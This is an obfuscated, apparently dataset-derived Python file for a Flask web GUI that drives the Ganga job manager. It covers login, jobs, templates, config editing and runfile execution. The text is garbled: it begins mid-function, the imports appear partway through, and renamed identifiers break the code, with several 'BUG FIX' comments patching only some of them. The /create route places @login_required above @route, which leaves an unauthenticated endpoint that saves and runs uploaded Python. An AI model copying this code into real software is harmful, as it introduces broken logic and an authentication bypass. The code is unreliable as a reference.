VAR_73 = {
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
}
try:
VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_88)
@VAR_0.route("/api/templates/<int:VAR_19>/full-print", methods=["GET"])
@FUNC_28
def FUNC_50(VAR_15, VAR_19: int):
try:
VAR_95 = FUNC_58(f"/internal/templates/{VAR_19}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_95)
@VAR_0.route("/api/templates/<int:VAR_19>", methods=["DELETE"])
@FUNC_28
def FUNC_51(VAR_15, VAR_19: int):
try:
VAR_98 = FUNC_58(f"/internal/templates/{VAR_19}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/credentials", methods=["GET"])
@FUNC_28
def FUNC_52(VAR_15):
try:
VAR_108 = FUNC_58("/internal/credentials", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_108)
@VAR_0.route("/api/credentials/renew", methods=["PUT"])
@FUNC_28
def FUNC_53(VAR_15):
try:
VAR_98 = FUNC_58("/internal/credentials/renew", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_98)
@VAR_0.route("/api/jobtree", methods=["GET"])
@FUNC_28
def FUNC_54(VAR_15):
try:
VAR_117 = FUNC_58("/internal/jobtree", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(VAR_117)
@VAR_0.route("/api/plugins", methods=["GET"])
@FUNC_28
def FUNC_55(VAR_15):
    """API: available plugin lists."""
    try:
        plugin_lists = FUNC_58("/internal/plugins", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(plugin_lists)
@VAR_0.route("/api/VAR_8/<VAR_12>", methods=["GET"])
@FUNC_28
def FUNC_56(VAR_15, VAR_12: str):
    """API: detailed information about the plugin named VAR_12."""
    try:
        plugin_detail = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(plugin_detail)
def FUNC_57(VAR_20):
    """Return True when VAR_20 has an extension in the VAR_6 whitelist."""
    pieces = VAR_20.rsplit(".", 1)
    return len(pieces) == 2 and pieces[1].lower() in VAR_6
def FUNC_58(VAR_21: str, VAR_22: str, **VAR_23):
    """Proxy a request to the internal Ganga API server.

    VAR_21: path on the internal server (e.g. "/internal/jobs").
    VAR_22: HTTP verb, one of get/post/put/delete (lowercase).
    VAR_23: extra keyword arguments forwarded to `requests.<verb>`.
    Returns the decoded JSON body; raises Exception on an unsupported
    verb or a non-200 reply.
    """
    # Validate the verb before touching app config so misuse fails fast.
    if VAR_22 not in ["get", "post", "put", "delete"]:
        # BUG FIX: the message referenced the undefined name `method`;
        # the parameter holding the verb is VAR_22.
        raise Exception(f"Unsupported VAR_22: {VAR_22}")
    VAR_76 = f"http://localhost:{VAR_0.config['INTERNAL_PORT']}"
    VAR_77 = getattr(requests, VAR_22)(VAR_76 + VAR_21, **VAR_23)
    if VAR_77.status_code != 200:
        raise Exception(VAR_77.json().get("message"))
    return VAR_77.json()
def FUNC_59():
    """Seed per-session pagination and filter defaults if absent.

    BUG FIX: the assignments used the undefined name `session`; the Flask
    session object is imported into this module as VAR_84.
    """
    if "templates_per_page" not in VAR_84:
        VAR_84["templates_per_page"] = 10
    if "templates_filter" not in VAR_84:
        VAR_84["templates_filter"] = {key: "any" for key in ["application", "backend"]}
    if "jobs_per_page" not in VAR_84:
        VAR_84["jobs_per_page"] = 10
    if "jobs_filter" not in VAR_84:
        VAR_84["jobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
    if "subjobs_per_page" not in VAR_84:
        VAR_84["subjobs_per_page"] = 10
    if "subjobs_filter" not in VAR_84:
        VAR_84["subjobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
def FUNC_60():
    """Poll the internal API until it answers /ping.

    Returns True once the server responds with True, False after ~20
    failed attempts (~40 s).
    """
    VAR_78 = 0
    while True:
        try:
            VAR_126 = FUNC_58("/ping", "get")
            if VAR_126 is True:
                return True
        except Exception:  # narrowed from a bare except; retry below
            pass
        # BUG FIX: the original only slept/counted on exception, so a
        # non-True ping reply produced a tight infinite loop.
        time.sleep(2)
        print("Internal API server not online (mostly because Ganga is booting up), retrying...")
        VAR_78 += 1
        if VAR_78 > 20:
            return False
def FUNC_61(VAR_24: int, VAR_25: str = ""):
    """Fork a pty and launch Ganga's web GUI mode in the child process.

    VAR_24: port for the internal API server (exported via env).
    VAR_25: extra command-line arguments appended to the ganga command.
    """
    (VAR_79, VAR_26) = pty.fork()
    if VAR_79 == 0:
        # Child process: run ganga attached to the slave end of the pty.
        VAR_118 = os.environ.copy()
        VAR_118["WEB_CLI"] = "True"
        VAR_118["INTERNAL_PORT"] = str(VAR_24)
        subprocess.run(f"ganga --webgui {VAR_25}", shell=True, env=VAR_118)
    else:
        # Parent: keep the master fd and child pid for the web terminal.
        VAR_0.config["FD"] = VAR_26
        VAR_0.config["CHILD_PID"] = VAR_79
        FUNC_62(VAR_26, 50, 50)
        print("Ganga started, PID: ", VAR_79)
def FUNC_62(VAR_26, VAR_27, VAR_28, VAR_29=0, VAR_30=0):
    """Set the pty window size: VAR_27 rows x VAR_28 cols (pixels optional)."""
    window = struct.pack("HHHH", VAR_27, VAR_28, VAR_29, VAR_30)
    fcntl.ioctl(VAR_26, termios.TIOCSWINSZ, window)
def FUNC_63():
    """Background task: pump output from the Ganga pty to the websocket.

    Polls the master fd with a zero-timeout select and emits any available
    bytes on the "pty-output" event of the /pty namespace.
    """
    VAR_81 = 1024 * 20  # maximum bytes forwarded per read
    while True:
        VAR_3.sleep(0.01)  # yield to the socketio event loop
        if VAR_0.config["FD"]:
            VAR_127 = 0  # zero timeout -> non-blocking poll
            (VAR_128, VAR_129, _) = select.select([VAR_0.config["FD"]], [], [], VAR_127)
            if VAR_128:
                VAR_131 = os.read(VAR_0.config["FD"], VAR_81).decode()
                VAR_3.emit("pty-output", {"output": VAR_131}, namespace="/pty")
def FUNC_64(VAR_31: str, VAR_32: int, VAR_24: int, VAR_33=True, VAR_34: str = ""):
    """Start the GUI server.

    VAR_31/VAR_32: host and port for the GUI; VAR_24: internal API port;
    VAR_33: socketio log_output flag; VAR_34: extra arguments for ganga.
    """
    from GangaGUI.start import create_default_user
    VAR_82, VAR_83 = create_default_user()
    print(f"Starting the GUI server on http://{VAR_31}:{VAR_32}")
    print(f"You VAR_2 information for the GUI is: Username: {VAR_82.user} Password: {VAR_83}")
    VAR_0.config["INTERNAL_PORT"] = VAR_24
    VAR_0.config["WEB_CLI"] = True
    VAR_0.config["GANGA_ARGS"] = VAR_34
    # BUG FIX: the keyword values referenced the undefined names
    # host/port/log_output; pass the actual parameters.
    VAR_3.run(VAR_0, VAR_31=VAR_31, VAR_32=VAR_32, VAR_33=VAR_33)
@VAR_0.route("/shutdown", methods=["GET"])
def FUNC_65():
    """Shut the GUI server down via the internal API (refused in CLI mode)."""
    if VAR_0.config["WEB_CLI"] is True:
        flash("WEB CLI Mode is on, cannot self FUNC_65 server. Consider doing manually.", "warning")
        return redirect(url_for("dashboard"))
    try:
        FUNC_58("/shutdown", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return "GUI Shutdown Successful."
import os
import sys
import pty
import jwt
import json
import time
import fcntl
import select
import struct
import termios
import datetime
import requests
import subprocess
from functools import wraps
from werkzeug.utils import secure_filename, safe_join
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, VAR_84, send_file, make_response
from flask_login import login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
# Flask application object and extension wiring.
VAR_0 = Flask(__name__)
VAR_0.config.from_object(Config)
VAR_1 = SQLAlchemy(VAR_0)  # ORM handle for the users database
VAR_2 = LoginManager(VAR_0)  # cookie/session login for the browser UI
VAR_2.login_view = "login"
VAR_2.login_message = "Please Login to Access this Page."
VAR_2.login_message_category = "warning"
VAR_3 = SocketIO(VAR_0)  # websocket layer for the embedded terminal
class CLASS_0(UserMixin, VAR_1.Model):
    """Database model for GUI users (login credentials, API tokens, pins)."""
    __tablename__ = "users"
    VAR_35 = VAR_1.Column(VAR_1.Integer, primary_key=True)
    VAR_36 = VAR_1.Column(VAR_1.String(64), unique=True)  # queried as the token's public_id by FUNC_28
    VAR_37 = VAR_1.Column(VAR_1.String(32), unique=True)  # username (filtered on at login)
    VAR_38 = VAR_1.Column(VAR_1.String(64))
    VAR_39 = VAR_1.Column(VAR_1.String(32))
    VAR_40 = VAR_1.Column(VAR_1.Text)  # JSON-encoded list of pinned job ids
    def FUNC_66(self, VAR_41: str):
        """Store a salted hash of VAR_41; the plain text is never kept."""
        self.password_hash = generate_password_hash(VAR_41)
    def FUNC_67(self, VAR_41: str) -> bool:
        """Return True when VAR_41 matches the stored password hash."""
        return check_password_hash(self.password_hash, VAR_41)
    def FUNC_68(self, VAR_42: int = 5) -> str:
        """Return a signed JWT for this user, valid for VAR_42 days.

        NOTE(review): reads self.public_id — presumably the VAR_36 column
        before obfuscation; confirm the attribute name.
        """
        return jwt.encode(
            {"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=VAR_42)},
            VAR_0.config["SECRET_KEY"], algorithm="HS256")
    def __repr__(self):
        return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
@VAR_2.user_loader
def FUNC_0(VAR_4):
    """Flask-Login callback: map a session user id to its CLASS_0 row."""
    numeric_id = int(VAR_4)
    return CLASS_0.query.get(numeric_id)
# Bootstrap color class used by the templates for each job status.
VAR_5 = {
    "new": "info",
    "completed": "success",
    "completed_frozen": "success",
    "failed": "danger",
    "failed_frozen": "danger",
    "running": "primary",
    "submitted": "secondary",
    "killed": "warning"
}
# Allowed upload extensions for load/run files (see FUNC_57).
VAR_6 = {"txt", "py"}
# Kept for backward compatibility; the module elsewhere uses VAR_7.
actions = {}
# BUG FIX: the rest of the module reads the global VAR_7 (job actions),
# but only `actions` was initialized — a failed fetch in FUNC_1 would
# leave VAR_7 undefined. Initialize both empty.
VAR_7 = {}
# Plugin lists (backends/applications), fetched in FUNC_1.
VAR_8 = {}
@VAR_0.before_first_request
def FUNC_1():
    """One-time boot hook: start Ganga (web-CLI mode), reset any stale
    login, seed session defaults, wait for the internal API, then cache
    the job actions and plugin lists.

    NOTE(review): the return value of a before_first_request hook is
    ignored by Flask, so the redirect in the except branch has no effect
    beyond flashing the error.
    """
    global VAR_7, VAR_8
    if VAR_0.config['WEB_CLI'] is True:
        # Web-CLI mode: fork Ganga ourselves on the configured port.
        FUNC_61(VAR_0.config['INTERNAL_PORT'], VAR_25=VAR_0.config["GANGA_ARGS"])
        VAR_84["WEB_CLI"] = True
    elif VAR_0.config['INTERNAL_PORT'] is None:
        VAR_0.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
    if current_user.is_authenticated:
        logout_user()
    FUNC_59()  # seed per-session pagination/filter defaults
    if not FUNC_60():
        print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
        sys.exit(1)
    try:
        VAR_7 = FUNC_58("/internal/jobs/actions", "get")
        VAR_8 = FUNC_58("/internal/plugins", "get")
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
@VAR_0.route("/login", methods=["GET", "POST"])
def VAR_2():
    """Login view: authenticate posted credentials and start a session."""
    if current_user.is_authenticated:
        return redirect(url_for("dashboard"))
    if request.method == "POST":
        VAR_85 = request.form.get("username")
        VAR_41 = request.form.get("password")
        VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_85).first()
        if VAR_37 and VAR_37.verify_password(VAR_41):
            login_user(VAR_37, True)
            flash("Login successful", "success")
            return redirect(url_for("dashboard"))
        flash("Error identifying the user", "danger")
    VAR_43 = CLASS_0.query.all()
    # BUG FIX: the template keyword referenced the undefined name `users`;
    # the list fetched above is VAR_43.
    return render_template("login.html", title="Login", VAR_43=VAR_43)
@VAR_0.route("/logout", methods=["GET"])
def FUNC_3():
    """Log the current user out (no-op when anonymous), then show login."""
    if current_user.is_authenticated:
        logout_user()
    return redirect(url_for("login"))
@VAR_0.route("/")
@login_required
def FUNC_4():
    """Dashboard: job statistics, recent jobs and the user's pinned jobs."""
    VAR_44 = {}
    VAR_45 = []
    VAR_46 = []
    try:
        VAR_44 = FUNC_58("/internal/jobs/statistics", "get")
        VAR_45 = FUNC_58("/internal/jobs/recent", "get")
        VAR_72 = current_user
        VAR_46 = FUNC_58("/internal/jobs", "get", VAR_73={
            "ids": VAR_72.pinned_jobs if VAR_72.pinned_jobs is not None else json.dumps([]),
            "auto-validate-ids": True})
    except Exception as err:
        flash(str(err), "danger")
    # BUG FIX: the template keywords referenced undefined names
    # (quick_statistics, recent_jobs_info, ...); pass the locals.
    return render_template("dashboard.html",
                           title="Dashboard",
                           VAR_44=VAR_44,
                           VAR_45=VAR_45,
                           VAR_46=VAR_46,
                           VAR_5=VAR_5)
@VAR_0.route("/config", methods=["GET", "POST"])
@login_required
def FUNC_5():
    """Config page; POST narrows the display to one section."""
    VAR_47 = []
    VAR_48 = []
    VAR_18 = None
    if request.method == "POST":
        VAR_18 = request.form.get("section")
        VAR_18 = None if VAR_18 in ["", None] else VAR_18
    try:
        VAR_47 = FUNC_58("/internal/config", "get")
        VAR_48 = VAR_47 if VAR_18 is None else [s for s in VAR_47 if s["name"] == VAR_18]
    except Exception as err:
        flash(str(err), "danger")
    # BUG FIX: the template keywords referenced the undefined names
    # full_config_info/config_info; pass the locals.
    return render_template("config.html", title="Config", VAR_47=VAR_47, VAR_48=VAR_48)
@VAR_0.route("/config_edit",methods=["GET", "POST"])
@login_required
def FUNC_6():
    """View and edit the .gangarc file in the browser."""
    VAR_49 = VAR_0.config["GANGA_RC"]
    with open(VAR_49, "rt") as VAR_14:
        VAR_86 = VAR_14.read()
    if request.method == 'POST':
        VAR_87 = request.form['config-data']
        with open(VAR_49, 'w') as f1:
            f1.write(str(VAR_87))
        flash(".gangarc Edited", "success")
        with open(VAR_49, "rt") as f2:
            VAR_86 = f2.read()
    # BUG FIX: the template keyword referenced the undefined name
    # `ganga_config`; the file contents are in VAR_86.
    return render_template("config_edit.html", title="Edit gangarc", VAR_86=VAR_86)
@login_required
@VAR_0.route("/create", methods=["GET", "POST"])
def FUNC_7():
    """Create page: upload a load-file or run-file, or pick a template."""
    if request.method == "POST":
        if "loadfile" in request.files:
            VAR_119 = request.files["loadfile"]
            if VAR_119.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            if VAR_119 and FUNC_57(VAR_119.filename):
                VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
                VAR_119.save(VAR_130)
                try:
                    VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_130})
                except Exception as err:
                    flash(str(err), "danger")
                    return redirect(request.url)
                flash(VAR_98.get("message"), "success")
                return redirect(request.url)
        if "runfile" in request.files:
            VAR_120 = request.files["runfile"]
            if VAR_120.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            if VAR_120 and FUNC_57(VAR_120.filename):
                VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
                VAR_120.save(VAR_130)
                try:
                    VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_130})
                except Exception as err:
                    flash(str(err), "danger")
                    return redirect(request.url)
                flash(VAR_98.get("message"), "success")
                return redirect(request.url)
        flash("No file, retry!", "warning")
        return redirect(request.url)
    try:
        VAR_88 = FUNC_58("/internal/templates", "get",
                         VAR_73={"recent": True, "length": "6"})
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    # BUG FIX: the template keyword referenced the undefined name
    # `templates_info`; the fetched list is VAR_88.
    return render_template("create.html", title="Create", VAR_88=VAR_88)
@VAR_0.route("/create/runfile", methods=["GET", "POST"])
@login_required
def FUNC_8():
    """Runfile editor: POST saves the text and asks Ganga to execute it."""
    VAR_50 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
    if request.method == "POST":
        VAR_89 = request.form.get("runfile-data")
        with open(VAR_50, "w+") as VAR_14:
            # BUG FIX: wrote via the undefined name `f`; the handle is VAR_14.
            VAR_14.write(VAR_89)
        try:
            VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_50})
            flash(VAR_98["message"], "success")
        except Exception as err:
            flash(str(err), "danger")
        return redirect(request.url)
    return render_template("runfile.html", title="Runfile")
@VAR_0.route("/templates", methods=["GET", "POST"])
@login_required
def FUNC_9():
    """Paginated templates list; POST updates session page size/filters."""
    if request.method == "POST":
        # BUG FIX: assignments used the undefined name `session`; the
        # Flask session object is imported as VAR_84.
        VAR_84["templates_per_page"] = int(request.form.get("templates-per-page"))
        VAR_84["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
                                      zip(["application", "backend"], ["template-application", "template-backend"])}
    VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
    VAR_52 = VAR_84["templates_per_page"]
    try:
        VAR_90 = FUNC_58("/internal/templates/length", "get", VAR_73=VAR_84["templates_filter"])
        VAR_91 = (int(VAR_90) // int(VAR_52)) + 1
        if VAR_51 >= VAR_91:
            return redirect(url_for("templates_page", page=VAR_91 - 1))
        # BUG FIX: the filter copy was bound to `params` but updated and
        # passed via the undefined name VAR_73 — use one name throughout.
        VAR_73 = VAR_84["templates_filter"].copy()
        VAR_73.update({
            "recent": True,
            "length": VAR_52,
            "offset": VAR_51
        })
        VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=VAR_73)
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("create_page"))
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("templates.html",
                           title="Templates",
                           VAR_91=VAR_91,
                           VAR_51=VAR_51,
                           backends=VAR_8["backends"],
                           applications=VAR_8["applications"],
                           VAR_88=VAR_88)
@VAR_0.route("/jobs", methods=["GET", "POST"])
@login_required
def FUNC_10():
    """Paginated jobs list; POST updates session page size and filters."""
    if request.method == "POST":
        # BUG FIX: assignments used the undefined name `session`; the
        # Flask session object is imported as VAR_84.
        VAR_84["jobs_per_page"] = int(request.form.get("jobs-per-page"))
        VAR_84["jobs_filter"] = {key: request.form.get(form_name) for key, form_name in
                                 zip(["status", "application", "backend"],
                                     ["job-status", "job-application", "job-backend"])}
    VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
    VAR_53 = VAR_84["jobs_per_page"]
    try:
        VAR_92 = FUNC_58("/internal/jobs/length", "get", VAR_73=VAR_84["jobs_filter"])
        VAR_91 = (int(VAR_92) // int(VAR_53)) + 1
        if VAR_51 >= VAR_91:
            return redirect(url_for("jobs_page", page=VAR_91 - 1))
        # BUG FIX: `params` vs undefined VAR_73 — use one name throughout.
        VAR_73 = VAR_84["jobs_filter"].copy()
        VAR_73.update({
            "recent": True,
            "length": VAR_53,
            "offset": VAR_51
        })
        VAR_93 = FUNC_58("/internal/jobs", "get", VAR_73=VAR_73)
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("jobs.html",
                           title="Jobs",
                           VAR_93=VAR_93,
                           backends=VAR_8["backends"],
                           applications=VAR_8["applications"],
                           VAR_91=VAR_91,
                           VAR_51=VAR_51,
                           VAR_5=VAR_5)
@VAR_0.route('/jobs/<int:VAR_9>')
@login_required
def FUNC_11(VAR_9: int):
    """Job page: info, full print and captured stdout/stderr of job VAR_9."""
    VAR_54 = None
    VAR_55 = None
    try:
        VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
        VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
        VAR_96 = os.path.join(VAR_94["outputdir"], "stdout")
        VAR_97 = os.path.join(VAR_94["outputdir"], "stderr")
        if os.path.exists(VAR_96):
            with open(VAR_96) as VAR_14:
                VAR_54 = VAR_14.read()
        if os.path.exists(VAR_97):
            with open(VAR_97) as VAR_14:
                VAR_55 = VAR_14.read()
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("jobs_page"))
    # BUG FIX: template keywords referenced undefined names
    # (job_info, status_color, stdout, ...); pass the locals.
    return render_template("job.html",
                           title=f"Job {VAR_9}",
                           VAR_94=VAR_94,
                           VAR_5=VAR_5,
                           attribute_actions=VAR_7.get("attributes"),
                           method_actions=VAR_7.get("methods"),
                           VAR_54=VAR_54,
                           VAR_55=VAR_55,
                           VAR_95=VAR_95)
@VAR_0.route("/jobs/<int:VAR_9>/export")
@login_required
def FUNC_12(VAR_9: int):
    """Export job VAR_9 to a text file and send it as a download."""
    VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "export.txt")
    try:
        FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
        return send_file(VAR_56, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{VAR_9}.txt")
    except Exception as err:
        flash(str(err), "danger")
        # BUG FIX: url_for keyword referenced the undefined name `job_id`.
        return redirect(url_for("job_page", VAR_9=VAR_9))
@VAR_0.route("/jobs/<int:VAR_9>/edit", methods=["GET", "POST"])
@login_required
def FUNC_13(VAR_9: int):
    """Edit page: show exported job text; POST saves and reloads it."""
    VAR_57 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
    VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "export.txt")
    if request.method == "POST":
        VAR_99 = request.form.get("edited-job-info")
        with open(VAR_57, "w+") as VAR_14:
            # BUG FIX: wrote via the undefined name `f`; the handle is VAR_14.
            VAR_14.write(VAR_99)
        try:
            VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_57})
            flash(VAR_98["message"], "success")
        except Exception as err:
            flash(str(err), "danger")
        return redirect(request.url)
    try:
        FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
        with open(VAR_56) as VAR_14:
            VAR_121 = VAR_14.read()
    except Exception as err:
        flash(str(err), "danger")
        # BUG FIX: url_for keyword referenced the undefined name `job_id`.
        return redirect(url_for("job_page", VAR_9=VAR_9))
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("edit_job.html", title=f"Edit Job {VAR_9}", VAR_9=VAR_9, VAR_121=VAR_121)
@VAR_0.route("/job/<int:VAR_9>/browse", defaults={"path": ""})
@VAR_0.route("/job/<int:VAR_9>/browse/<VAR_10:path>")
@login_required
def FUNC_14(VAR_9: int, VAR_10):
    """Browse the output directory tree of job VAR_9 (safe-joined path)."""
    try:
        VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
        VAR_100 = os.path.dirname(os.path.dirname(VAR_94["outputdir"]))
    except Exception as err:
        flash(str(err), "danger")
        # BUG FIX: url_for keyword referenced the undefined name `job_id`.
        return redirect(url_for("job_page", VAR_9=VAR_9))
    # safe_join confines the user-supplied path to the job directory.
    VAR_58 = safe_join(VAR_100, VAR_10)
    VAR_59 = os.path.dirname(VAR_58).replace(VAR_100, "")
    if not os.path.exists(VAR_58):
        flash("Directory for this job does not exist.", "warning")
        return redirect(url_for("job_page", VAR_9=VAR_9))
    if os.path.isfile(VAR_58):
        return send_file(VAR_58)
    VAR_60 = []
    VAR_61 = os.listdir(VAR_58)
    for file in VAR_61:
        VAR_60.append({
            "file": file,
            "directory": os.path.isdir(os.path.join(VAR_58, file))
        })
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template('job_dir.html', title=f"Job {VAR_9} Directory",
                           VAR_9=VAR_9,
                           VAR_58=VAR_58,
                           VAR_60=VAR_60,
                           VAR_59=VAR_59)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs", methods=["GET", "POST"])
@login_required
def FUNC_15(VAR_9: int):
    """Paginated subjobs of job VAR_9; POST updates session filters."""
    if request.method == "POST":
        # BUG FIX: assignments used the undefined name `session`; the
        # Flask session object is imported as VAR_84.
        VAR_84["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
        VAR_84["subjobs_filter"] = {key: request.form.get(form_name) for key, form_name in
                                    zip(["status", "application", "backend"],
                                        ["subjob-status", "subjob-application", "subjob-backend"])}
    VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
    VAR_62 = VAR_84["subjobs_per_page"]
    try:
        VAR_101 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/length", "get",
                          VAR_73=VAR_84["subjobs_filter"])
        VAR_91 = (int(VAR_101) // int(VAR_62)) + 1
        if VAR_51 >= VAR_91:
            # BUG FIX: keyword referenced the undefined name `job_id`.
            return redirect(url_for("subjobs_page", page=VAR_91 - 1, VAR_9=VAR_9))
        # BUG FIX: `params` vs undefined VAR_73 — use one name throughout.
        VAR_73 = VAR_84["subjobs_filter"].copy()
        VAR_73.update({
            "recent": True,
            "length": VAR_62,
            "offset": VAR_51
        })
        VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=VAR_73)
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("job_page", VAR_9=VAR_9))
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("subjobs.html",
                           title=f"Subjobs - Job {VAR_9}",
                           VAR_5=VAR_5,
                           VAR_91=VAR_91,
                           VAR_51=VAR_51,
                           backends=VAR_8["backends"],
                           applications=VAR_8["applications"],
                           VAR_102=VAR_102,
                           VAR_9=VAR_9)
@VAR_0.route("/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@login_required
def FUNC_16(VAR_9: int, VAR_11: int):
    """Subjob page: info, full print, stdout/stderr of subjob VAR_11."""
    VAR_54 = None
    VAR_55 = None
    try:
        VAR_103 = FUNC_58(f"/internal/jobs/{VAR_9}/outputdir", "get")
        VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
        VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
        VAR_105 = os.path.dirname(os.path.dirname(VAR_103["outputdir"]))
        VAR_106 = os.path.dirname(os.path.dirname(VAR_104["outputdir"]))
        VAR_107 = VAR_106.replace(VAR_105, "")
        VAR_96 = os.path.join(VAR_104["outputdir"], "stdout")
        VAR_97 = os.path.join(VAR_104["outputdir"], "stderr")
        if os.path.exists(VAR_96):
            with open(VAR_96) as VAR_14:
                VAR_54 = VAR_14.read()
        if os.path.exists(VAR_97):
            with open(VAR_97) as VAR_14:
                VAR_55 = VAR_14.read()
    except Exception as err:
        flash(str(err), "danger")
        # BUG FIX: keyword referenced the undefined name `job_id`.
        return redirect(url_for("subjobs_page", VAR_9=VAR_9))
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("subjob.html",
                           title=f"Subjob {VAR_11} - Job {VAR_9}",
                           VAR_104=VAR_104,
                           VAR_5=VAR_5,
                           attribute_actions=VAR_7["attributes"],
                           method_actions=VAR_7["methods"],
                           VAR_54=VAR_54,
                           VAR_55=VAR_55,
                           VAR_95=VAR_95,
                           VAR_9=VAR_9,
                           VAR_107=VAR_107)
@VAR_0.route("/credentials")
@login_required
def FUNC_17():
    """Credential store page."""
    try:
        credential_list = FUNC_58("/internal/credentials", "get")
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    return render_template('credentials.html', credential_info_list=credential_list)
@VAR_0.route("/queue", methods=["GET"])
@login_required
def FUNC_18():
    """Ganga queue status page."""
    try:
        queue_list = FUNC_58("/internal/queue", "get")
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    return render_template('queue.html', queue_info_list=queue_list)
@VAR_0.route('/plugins')
@login_required
def FUNC_19():
    """Plugins overview page (uses the cached plugin lists)."""
    try:
        VAR_110 = VAR_8
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    # BUG FIX: the template keyword referenced the undefined name
    # `plugins_info`; the local is VAR_110.
    return render_template('plugins.html', VAR_110=VAR_110)
@VAR_0.route("/plugin/<VAR_12>")
@login_required
def FUNC_20(VAR_12: str):
    """Single plugin page for the plugin named VAR_12."""
    try:
        VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("plugins_page"))
    # BUG FIX: the template keyword referenced the undefined name
    # `plugin_info`; the fetched info is VAR_111.
    return render_template("plugin.html", title=f"{VAR_12}", VAR_111=VAR_111)
@VAR_0.route("/logs")
@login_required
def FUNC_21():
    """Logs page: Ganga log plus GUI access and error logs."""
    VAR_63 = VAR_0.config["GANGA_LOG"]
    VAR_64 = VAR_0.config["ACCESS_LOG"]
    VAR_65 = VAR_0.config["ERROR_LOG"]
    try:
        with open(VAR_63, "rt") as VAR_14:
            VAR_122 = VAR_14.read()
        with open(VAR_64, "rt") as VAR_14:
            VAR_123 = VAR_14.read()
        with open(VAR_65, "rt") as VAR_14:
            VAR_124 = VAR_14.read()
    except Exception as err:
        flash(str(err), "danger")
        return redirect(url_for("dashboard"))
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("logs.html", title="Logs", VAR_122=VAR_122,
                           VAR_123=VAR_123, VAR_124=VAR_124)
@VAR_0.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
